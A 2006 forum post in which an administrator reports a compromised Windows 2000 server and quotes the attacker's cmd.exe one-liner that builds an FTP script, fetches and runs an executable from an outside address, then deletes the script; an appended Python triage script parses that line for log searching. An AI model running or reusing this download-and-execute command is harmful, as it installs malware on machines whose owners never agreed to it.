Compromised Windows 2000 Server?
Posted on 2006-10-25
I logged into a Win2k Server in a remote office this morning and was greeted by two FTP DOS screens with the following in them:
126.96.36.199 Microsoft FTP
get 84785_redworld2.exe etc. etc.
Then there is some reference to 'Lizard Welcomes You' after FTP login.
This was in Start - Run:
cmd /c echo OPEN 188.8.131.52 29212>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit
It certainly appears that the server has been accessed from an external source. We use a SonicWall firewall, and the server is fully patched. Can anyone shed some light on this please?
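
Triage note on the Start - Run entry quoted above: it is a cmd.exe one-liner that echoes an FTP script into a file named x, runs FTP against that script, starts the downloaded file and then deletes the script. The following is an added example, not part of the original post; the function name `analyze` and the report fields are illustrative assumptions, and it unpacks such a command line into host, port, file names and cleanup steps so the values can be searched for in firewall and process logs.

```python
import re

# Command line exactly as quoted in the post (address shown as it appears on the page).
SAMPLE = ("cmd /c echo OPEN 188.8.131.52 29212>x&echo GET 84785_redworld2.exe>>x"
          "&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit")

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*(>>?)\s*(\S+)$", re.I)   # echo TEXT > or >> FILE
FTP_RE = re.compile(r"^ftp(?:\.exe)?\b.*?-s:(\S+)", re.I)       # ftp ... -s:SCRIPTFILE


def analyze(cmdline):
    """Split a cmd.exe one-liner on '&' and rebuild the FTP script it writes."""
    body = re.sub(r"^\s*cmd(?:\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    steps = [s.strip() for s in body.split("&") if s.strip()]
    files = {}  # file name -> lines echoed into it so far
    report = {"host": None, "port": None, "script": None,
              "downloads": [], "executed": [], "deleted": []}
    for step in steps:
        m = ECHO_RE.match(step)
        if m:
            text, op, name = m.groups()
            if op == ">":              # '>' truncates, '>>' appends
                files[name] = []
            files.setdefault(name, []).append(text)
            continue
        m = FTP_RE.match(step)
        if m:                          # interpret the script FTP was pointed at
            report["script"] = m.group(1)
            for line in files.get(m.group(1), []):
                parts = line.split()
                verb = parts[0].lower() if parts else ""
                if verb == "open" and len(parts) >= 2:
                    report["host"] = parts[1]
                    report["port"] = int(parts[2]) if len(parts) > 2 else 21
                elif verb in ("get", "recv") and len(parts) >= 2:
                    report["downloads"].append(parts[1])
            continue
        words = step.split()
        if words[0].lower() in ("del", "erase"):
            report["deleted"] += words[1:]
        elif words[0] in report["downloads"]:
            report["executed"].append(words[0])
    # Alert condition: a fetched file is run and the script that fetched it is removed.
    report["suspicious"] = bool(report["executed"]) and report["script"] in report["deleted"]
    return report


if __name__ == "__main__":
    print(analyze(SAMPLE))
```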